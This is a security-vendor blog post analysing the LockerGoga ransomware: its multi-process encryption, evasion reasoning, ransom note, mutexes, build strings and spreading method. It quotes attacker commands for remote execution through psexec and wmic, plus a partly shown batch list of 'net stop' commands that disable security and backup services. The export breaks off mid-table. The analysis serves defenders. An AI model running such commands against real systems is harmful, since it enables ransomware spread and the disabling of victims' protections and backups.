{"id":95044,"date":"2019-04-29T10:10:06","date_gmt":"2019-04-29T17:10:06","guid":{"rendered":"https:\/\/securingtomorrow.mcafee.com\/?p=95044"},"modified":"2024-02-18T19:21:46","modified_gmt":"2024-02-19T03:21:46","slug":"lockergoga-ransomware-family-used-in-targeted-attacks","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/","title":{"rendered":"LockerGoga Ransomware Family Used in Targeted Attacks"},"content":{"rendered":"<p>Co-authored by Marc RiveroLopez.<\/p>\n<h2>Initial discovery<\/h2>\n<p>Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new features to the tried and true formula of encrypting victims\u2019 files and asking for payment to decrypt them, has gained notoriety for the targets it has affected.<\/p>\n<p>In this blog, we will look at the findings of the McAfee ATR team following analysis of several different samples. We will describe how this new ransomware works and detail how enterprises can protect themselves from this threat.<\/p>\n<h2>Technical analysis<\/h2>\n<p>LockerGoga is a ransomware that exhibits some interesting behaviors we want to highlight. Based on our research, and compared with other families, it has a few unique functions and capabilities that are rare compared to other ransomware families that have similar objectives and\/or targeted sectors in their campaigns.<\/p>\n<p>In order to uncover its capabilities, we analyzed all the samples we found, discovering similarities between them, as well as how the development lifecycle adds or modifies different features in the code to evolve the ransomware in a more professional tool used by the group behind it.<\/p>\n<p>One of the main differences between LockerGoga and other ransomware families is the ability to spawn different processes in order to accelerate the file encryption in the system:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95045\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Timeline.png\" alt=\"\" width=\"1296\" height=\"491\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Timeline.png 1296w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Timeline-300x114.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Timeline-768x291.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Timeline-1024x388.png 1024w\" sizes=\"auto, (max-width: 1296px) 100vw, 1296px\" \/><\/p>\n<p>Like other types of malware, LockerGoga will use all the available CPU resources in the system, as we discovered on our machines:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95046\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/CPU-usage.png\" alt=\"\" width=\"762\" height=\"510\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/CPU-usage.png 762w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/CPU-usage-300x201.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/CPU-usage-747x500.png 747w\" sizes=\"auto, (max-width: 762px) 100vw, 762px\" \/><\/p>\n<p>Most of the LockerGoga samples work the same way but we observed how they added and removed certain types of functionality during their development lifecycle.<\/p>\n<p>The ransomware needs be executed from a privileged account.<\/p>\n<p>LockerGoga works in a master\/slave configuration. The malware begins its infection on an endpoint by installing a copy of itself on the %TEMP% folder.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95051\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/box1.jpg\" alt=\"\" width=\"692\" height=\"90\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/box1.jpg 692w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/box1-300x39.jpg 300w\" sizes=\"auto, (max-width: 692px) 100vw, 692px\" \/><\/p>\n<p>After being copied, it will start a new process with the -m parameter.<\/p>\n<p>The master process runs with the -m parameter and is responsible for creating the list of files to encrypt and spawning the slaves.<\/p>\n<p>The slave processes will be executed with a different set of parameters as shown below. Each slave process will encrypt only a small number of files, to avoid heuristic detections available in endpoint security products. The list of files to encrypt is taken from the master process via IPC, an interface used to share data between applications in Microsoft Windows. The communication is done through IPC using a mapped section named SM-&lt;name of binary&gt;.<\/p>\n<p>Here is the IPC technique used by LockerGoga:<\/p>\n<ul>\n<li>The master process (run as &lt;LockerGogaBinary&gt; -m) creates a named section on the system for IPC.<\/li>\n<li>The section is named \u201cSM-tgytutrc\u201d.<\/li>\n<li>The master ransomware process posts the filepath of the file to be encrypted to the named section \u201cSM-tgytutrc\u201d.<\/li>\n<li>This section is used by the slave processes to pick up the filepath and encrypt the target file.<\/li>\n<\/ul>\n<p>Sandbox replication of master process screenshot below showing:<\/p>\n<ul>\n<li>Creation of the named section.<\/li>\n<li>Subsequent creation of slave processes to encrypt target files on the endpoint.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95047\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Slave-processes.png\" alt=\"\" width=\"1082\" height=\"1070\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes.png 1082w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-300x297.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-768x759.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-1024x1013.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-506x500.png 506w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-24x24.png 24w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-48x48.png 48w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Slave-processes-96x96.png 96w\" sizes=\"auto, (max-width: 1082px) 100vw, 1082px\" \/><\/p>\n<p>Sandbox replication of slave process (encryption process) below showing:<\/p>\n<ul>\n<li>Obtaining access to the section created by the master process.<\/li>\n<li>Reading and encryption of a target file found based on the filepath specified in the named section.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-95048 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Filepath-1024x940.png\" alt=\"\" width=\"1024\" height=\"940\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Filepath-1024x940.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Filepath-300x275.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Filepath-768x705.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Filepath-545x500.png 545w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Filepath.png 1405w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>The ransomware creates multiple slave processes on the endpoint to encrypt files. Some analysts believe this is the case simply because it speeds up the encryption process, but we are not convinced as the same outcome can be achieved via a multi-threaded approach in the ransomware process instead of a multi-process approach.<\/p>\n<p>Instead, we suspect this approach is adopted for the following reasons:<\/p>\n<ul>\n<li><strong>Footprint:<\/strong>\u00a0If every encryption process encrypts only a small number of files on the endpoint and terminates, then the overall footprint of the attack on the system decreases since it may be difficult to co-relate multiple encryption processes to the same threat.<\/li>\n<li><strong>Sandbox Bypass<\/strong>: Some sandbox-based detection systems monitor the threshold of the number of files written on the system and may co-relate it to the file extensions being written to. E.g. If a process reads, say, 200 files on the sandbox but only creates files with one specific extension (typical of ransomware &#8211; Extn \u201c.locked\u201d in the case of LockerGoga) then this can be considered anomalous behavior. LockerGoga may be able to bypass such detection techniques.<\/li>\n<li><strong>File I\/O based detection bypass<\/strong>: A multi-process-based approach makes sure that the amount of I\/O (File\/Disk I\/O etc.) for each encryption process is within a certain limit, thus bypassing detection techniques that monitor exorbitant I\/O based detection.<\/li>\n<li><strong>Reliability<\/strong>: Even if one encryption process is manually terminated by an end-user, as long as the master ransomware process is running the files will continue to be encrypted by new slave processes. If the ransomware process does not use the multi-process approach, then terminating the ransomware process stops the encryption on the endpoint.<\/li>\n<\/ul>\n<p><strong><u>Username Administrator:<\/u><\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95053\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/box2.jpg\" alt=\"\" width=\"694\" height=\"193\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/box2.jpg 694w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/box2-300x83.jpg 300w\" sizes=\"auto, (max-width: 694px) 100vw, 694px\" \/><\/p>\n<p><strong><u>Username Tinba:<\/u><\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95054\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/box3.jpg\" alt=\"\" width=\"690\" height=\"195\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/box3.jpg 690w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/box3-300x85.jpg 300w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/p>\n<p>The author implemented a logging function that can be enabled if you callout the sample in execution using the parameter &#8220;-l&#8221; to store all the results in a file called &#8216;log.txt&#8217; in the root C drive:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95055\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Logging.png\" alt=\"\" width=\"1730\" height=\"736\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Logging.png 1730w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Logging-300x128.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Logging-768x327.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Logging-1024x436.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Logging-1175x500.png 1175w\" sizes=\"auto, (max-width: 1730px) 100vw, 1730px\" \/><\/p>\n<p>During execution we enabled the log function and saw how the ransomware encrypts the system, causing high CPU usage and opening the ransom note during the process. This is the aspect in an infected system:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95056\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Infected-system.png\" alt=\"\" width=\"1784\" height=\"676\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Infected-system.png 1784w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Infected-system-300x114.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Infected-system-768x291.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Infected-system-1024x388.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Infected-system-1320x500.png 1320w\" sizes=\"auto, (max-width: 1784px) 100vw, 1784px\" \/><\/p>\n<p>As we executed the sample with the log function, we could access this file to check the status of the encryption. Obviously, this most likely a debug function used by the developer.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95057\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Debug-function.png\" alt=\"\" width=\"1848\" height=\"1002\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Debug-function.png 1848w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Debug-function-300x163.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Debug-function-768x416.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Debug-function-1024x555.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Debug-function-922x500.png 922w\" sizes=\"auto, (max-width: 1848px) 100vw, 1848px\" \/><\/p>\n<p>In order to know how the ransomware works, and with the help of the log function enabled, we could establish the order of LockerGoga to encrypt the system:<\/p>\n<ul>\n<li>Log file creation in the C: drive<\/li>\n<li>Folder and file enumeration<\/li>\n<li>File encryption &amp; ransom note creation in the desktop folder.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95058\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Encryption.png\" alt=\"\" width=\"1300\" height=\"296\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Encryption.png 1300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Encryption-300x68.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Encryption-768x175.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Encryption-1024x233.png 1024w\" sizes=\"auto, (max-width: 1300px) 100vw, 1300px\" \/><\/p>\n<p>One interesting thing to mention is that, before encrypting any file in the system, the malware will search for files in the trashcan folder as the first option. We are not certain why it takes this unusual step, though it could be because many people do not empty their recycle bins and the ransomware is looking to encrypt even those files that may no longer be required:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95059\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Recycle-bin.png\" alt=\"\" width=\"1352\" height=\"480\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Recycle-bin.png 1352w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Recycle-bin-300x107.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Recycle-bin-768x273.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Recycle-bin-1024x364.png 1024w\" sizes=\"auto, (max-width: 1352px) 100vw, 1352px\" \/><\/p>\n<p>LockerGoga will start to enumerate all the folders and files in the system to start the encryption process. This enumeration is done in parallel, so we can expect the process wouldn\u2019t take much time.<\/p>\n<p>After the enumeration the ransomware will create the ransom note for the victim:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95060\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Ransom-note.png\" alt=\"\" width=\"1297\" height=\"239\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Ransom-note.png 1297w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Ransom-note-300x55.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Ransom-note-768x142.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Ransom-note-1024x189.png 1024w\" sizes=\"auto, (max-width: 1297px) 100vw, 1297px\" \/><\/p>\n<p>The ransom note was created in parallel with the encrypted files, and it is hardcoded inside the sample:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95061\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Hardcoding.png\" alt=\"\" width=\"1628\" height=\"712\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Hardcoding.png 1628w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Hardcoding-300x131.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Hardcoding-768x336.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Hardcoding-1024x448.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Hardcoding-1143x500.png 1143w\" sizes=\"auto, (max-width: 1628px) 100vw, 1628px\" \/><\/p>\n<p>Like other ransomware families, LockerGoga will create the ransom note file to ask the user to pay to recover their encrypted files. We highly recommend not paying under any circumstance so as not to continue funding an underground business model. In case of a ransomware infection, please check <a href=\"https:\/\/www.nomoreransom.org\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/www.nomoreransom.org<\/a><\/p>\n<p>Below is an example of the ransom note content on an infected machine:<\/p>\n<table style=\"height: 1268px;\" width=\"806\">\n<tbody>\n<tr>\n<td width=\"584\"><em>Greetings!<\/em><\/p>\n<p><em>There was a significant flaw in the security system of your company.<\/em><\/p>\n<p><em>You should be thankful that the flaw was exploited by serious people and not some rookies.<\/em><\/p>\n<p><em>They would have damaged all of your data by mistake or for fun.<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.<\/em><\/p>\n<p><em>Without our special decoder it is impossible to restore the data.<\/em><\/p>\n<p><em>Attempts to restore your data with third party software as Photorec, RannohDecryptor etc.<\/em><\/p>\n<p><em>will lead to irreversible destruction of your data.<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>To confirm our honest intentions.<\/em><\/p>\n<p><em>Send us 2-3 different random files and you will get them decrypted.<\/em><\/p>\n<p><em>It can be from different computers on your network to be sure that our decoder decrypts everything.<\/em><\/p>\n<p><em>Sample files we unlock for free (files should not be related to any kind of backups).<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>We exclusively have decryption software for your situation<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>DO NOT RESET OR SHUTDOWN &#8211; files may be damaged.<\/em><\/p>\n<p><em>DO NOT RENAME the encrypted files.<\/em><\/p>\n<p><em>DO NOT MOVE the encrypted files.<\/em><\/p>\n<p><em>This may lead to the impossibility of recovery of the certain files.<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>The payment has to be made in Bitcoins.<\/em><\/p>\n<p><em>The final price depends on how fast you contact us.<\/em><\/p>\n<p><em>As soon as we receive the payment you will get the decryption tool and<\/em><\/p>\n<p><em>instructions on how to improve your systems security<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>To get information on the price of the decoder contact us at:<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>In parallel of the ransom note creation, the files will start to be encrypted by LockerGoga with the .locked extension appended to all files. This extension has been broadly used by other ransomware families in the past:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95062\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Locked-extension.png\" alt=\"\" width=\"960\" height=\"448\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Locked-extension.png 960w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Locked-extension-300x140.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Locked-extension-768x358.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/p>\n<p>LockerGoga has embedded in the code the file extensions that it will encrypt. Below is an example:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95063\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/File-extensions.png\" alt=\"\" width=\"1036\" height=\"736\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-extensions.png 1036w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-extensions-300x213.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-extensions-768x546.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-extensions-1024x727.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-extensions-704x500.png 704w\" sizes=\"auto, (max-width: 1036px) 100vw, 1036px\" \/><\/p>\n<p>The sample has also configured some locations and files that will be skipped in the encryption process so as not to disrupt the Operating System from running.<\/p>\n<p>All the files encrypted by this ransomware will have a specific FileMarker inside:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-95064 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/File-marker-1024x337.png\" alt=\"\" width=\"1024\" height=\"337\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-marker-1024x337.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-marker-300x99.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-marker-768x253.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/File-marker.png 1392w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p><strong><u>Note:<\/u><\/strong> The FileMarker identifies the ransomware family and the most likely version; in this case it is 1440.<\/p>\n<p>During the investigation we identified the following versions:<\/p>\n<ul>\n<li>1200<\/li>\n<li>1510<\/li>\n<li>1440<\/li>\n<li>1320<\/li>\n<\/ul>\n<p>Based on the binary compile time and the extracted versions, we observed that the actors were creating different versions of LockerGoga for different targets\/campaigns.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95065\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Different-versions.png\" alt=\"\" width=\"1299\" height=\"797\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Different-versions.png 1299w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Different-versions-300x184.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Different-versions-768x471.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Different-versions-1024x628.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Different-versions-815x500.png 815w\" sizes=\"auto, (max-width: 1299px) 100vw, 1299px\" \/><\/p>\n<p>After encrypting, LockerGoga executes \u2018cipher.exe\u2019 to remove the free space to prevent file recovery in the infected system. When files are deleted on a system, sometimes they are still available in the free space of a hard disk and can theoretically be recovered.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-95066\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Free-space.png\" alt=\"\" width=\"1540\" height=\"220\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Free-space.png 1540w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Free-space-300x43.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Free-space-768x110.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Free-space-1024x146.png 1024w\" sizes=\"auto, (max-width: 1540px) 100vw, 1540px\" \/><\/p>\n<p><strong><u>Samples digitally signed:<\/u><\/strong><\/p>\n<p>During our triage phase we found that some of the LockerGoga samples are digitally signed. We are observing from ATR that the latest ransomware pieces used a lower scale and more focused are released digitally signed:<\/p>\n<ul>\n<li>MIKL LIMITED<\/li>\n<li>ALISA LTD<\/li>\n<li>KITTY&#8217;S LTD<\/li>\n<\/ul>\n<p>Digitally signing the malware could help the attackers to bypass some of the security protections in the system.<\/p>\n<p>As part of the infection process, LockerGoga will create a static mutex value in the system, always following the same format:<\/p>\n<p><em>MX-[a-z]\\w+<\/em><\/p>\n<p>Examples of mutex found:<\/p>\n<p>MX-imtvknqq<\/p>\n<p>MX-tgytutrc<\/p>\n<p>MX-zzbdrimp<\/p>\n<p><strong><u>Interesting strings found<\/u><\/strong><\/p>\n<p>In our analysis we extracted more strings from the LockerGoga samples, with interesting references to:<\/p>\n<ul>\n<li>LockerGoga<\/li>\n<li>crypto-locker<\/li>\n<li>goga<\/li>\n<\/ul>\n<table style=\"height: 525px;\" width=\"732\">\n<tbody>\n<tr>\n<td width=\"566\">E:\\\\crypto-locker\\\\cryptopp\\\\src\\\\crc_simd.cpp<\/p>\n<p>E:\\\\crypto-locker\\\\cryptopp\\\\src\\\\rijndael_simd.cpp<\/p>\n<p>E:\\\\crypto-locker\\\\cryptopp\\\\src\\\\sha_simd.cpp<\/p>\n<p>E:\\\\crypto-locker\\\\cryptopp\\\\src\\\\sse_simd.cpp<\/p>\n<p>E:\\\\goga\\\\cryptopp\\\\src\\\\crc_simd.cpp<\/p>\n<p>E:\\\\goga\\\\cryptopp\\\\src\\\\rijndael_simd.cpp<\/p>\n<p>E:\\\\goga\\\\cryptopp\\\\src\\\\sha_simd.cpp<\/p>\n<p>E:\\\\goga\\\\cryptopp\\\\src\\\\sse_simd.cpp<\/p>\n<p>X:\\\\work\\\\Projects\\\\LockerGoga\\\\cl-src-last\\\\cryptopp\\\\src\\\\crc_simd.cpp<\/p>\n<p>X:\\\\work\\\\Projects\\\\LockerGoga\\\\cl-src-last\\\\cryptopp\\\\src\\\\rijndael_simd.cpp<\/p>\n<p>X:\\\\work\\\\Projects\\\\LockerGoga\\\\cl-src-last\\\\cryptopp\\\\src\\\\sha_simd.cpp<\/p>\n<p>X:\\\\work\\\\Projects\\\\LockerGoga\\\\cl-src-last\\\\cryptopp\\\\src\\\\sse_simd.cpp<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The malware developers usually forget to remove those strings in their samples and we can use them to identify new families or frameworks used in their development.<\/p>\n<p><strong><u>Spreading methods:<\/u><\/strong><\/p>\n<p>The malware is known to be spread in the local network through remote file copy. To do that, a set of .batch files are copied to the remote machines TEMP folder using simple copy:<\/p>\n<ul>\n<li>copy xax.bat \\\\123.123.123.123\\c$\\windows\\temp<\/li>\n<\/ul>\n<p>The malware will copy itself and the tool PSEXEC.EXE to the same location. Once all the files are copied, the malware will run the .BAT file using the following command:<\/p>\n<ul>\n<li>start psexec.exe \\\\123.123.123.123 -u domain\\user -p \u201cpass\u201d -d -h -r mstdc -s accepteula -nobanner c:\\windows\\temp\\xax.bat<\/li>\n<\/ul>\n<p>Each of these .BAT files contain lines to execute the malware on remote machines. They use the following command:<\/p>\n<ul>\n<li>start wmic \/node:&#8221;123.123.123.123&#8243; \/user:&#8221;domain\\user&#8221; \/password:&#8221;pass&#8221; process call create &#8220;cmd \/c c:\\windows\\temp\\kill.bat&#8221;<\/li>\n<\/ul>\n<p>The batch file above attempts to kill several AV products and disable security tools. At the end of the script, the malware copy on the remote machine is executed from<\/p>\n<p>c:\\windows\\temp\\taskhost.exe.<\/p>\n<p>Due to the presence of these batch files and the fact that the malware binary makes no direct reference to them, we believe that the spreading mechanism is executed manually by an attacker or via an unknown binary. The path, username, and passwords are hardcoded in the scripts which indicate the attacker had previous knowledge of the environment.<\/p>\n<p>The following is a list of all the processes and services disabled by the malware:<\/p>\n<p>One batch file found in the infected systems where LockerGoga was executed will stop services and processes regarding critical services in the system and security software:<\/p>\n<table style=\"height: 3562px;\" width=\"830\">\n<tbody>\n<tr>\n<td width=\"307\"><strong><u>net stop BackupExecAgentAccelerator \/y<\/u><\/strong><\/td>\n<td width=\"340\"><strong><u>net stop McAfeeEngineService \/y<\/u><\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BackupExecAgentBrowser \/y<\/strong><\/td>\n<td width=\"340\">net stop McAfeeFramework \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BackupExecDeviceMediaService \/y<\/strong><\/td>\n<td width=\"340\">net stop McAfeeFrameworkMcAfeeFramework \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BackupExecJobEngine \/y<\/strong><\/td>\n<td width=\"340\">net stop McTaskManager \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BackupExecManagementService \/y<\/strong><\/td>\n<td width=\"340\">net stop mfemms \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BackupExecRPCService \/y<\/strong><\/td>\n<td width=\"340\">net stop mfevtp \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BackupExecVSSProvider \/y<\/strong><\/td>\n<td width=\"340\">net stop MMS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop bedbg \/y<\/strong><\/td>\n<td width=\"340\">net stop mozyprobackup \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop DCAgent \/y<\/strong><\/td>\n<td width=\"340\">net stop MsDtsServer \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop EPSecurityService \/y<\/strong><\/td>\n<td width=\"340\">net stop MsDtsServer100 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop EPUpdateService \/y<\/strong><\/td>\n<td width=\"340\">net stop MsDtsServer110 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop EraserSvc11710 \/y<\/strong><\/td>\n<td width=\"340\">net stop MSExchangeES \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop EsgShKernel 